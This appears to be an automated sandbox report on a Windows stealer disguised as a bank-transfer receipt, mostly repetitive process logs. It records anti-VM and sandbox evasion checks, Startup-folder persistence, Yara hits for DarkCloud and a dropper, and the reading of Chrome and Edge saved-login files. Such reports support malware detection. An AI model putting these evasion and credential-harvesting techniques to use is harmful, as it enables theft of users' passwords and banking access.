                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeWindow / User API: threadDelayed 1815Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeWindow / User API: threadDelayed 684Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeWindow / User API: threadDelayed 2143Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1680Thread sleep count: 1815 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1680Thread sleep count: 684 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99655s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99532s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -99071s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -98953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe TID: 1816Thread sleep time: -98844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 4160Thread sleep count: 2143 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99765s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99326s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe TID: 6392Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99891Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99655Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99532Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99422Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99313Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99188Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 99071Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 98953Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeThread delayed: delay time: 98844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99326Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: WebData.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: IsClosed.exe, 00000005.00000002.2222475791.0000000000A21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXs<
                    Source: WebData.2.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: WebData.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: WebData.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: WebData.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: WebData.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: WebData.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: WebData.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2089736087.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: WebData.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: WebData.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: WebData.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: WebData.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: WebData.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: WebData.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: WebData.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: WebData.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: WebData.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsClosed.exe "C:\Users\user\AppData\Roaming\IsClosed.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeQueries volume information: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeQueries volume information: C:\Users\user\AppData\Roaming\IsClosed.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DarkCloud
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.750000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3552, type: MEMORYSTR
                    Yara detected Generic Dropper
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.raw.unpack, type: UNPACKEDPE
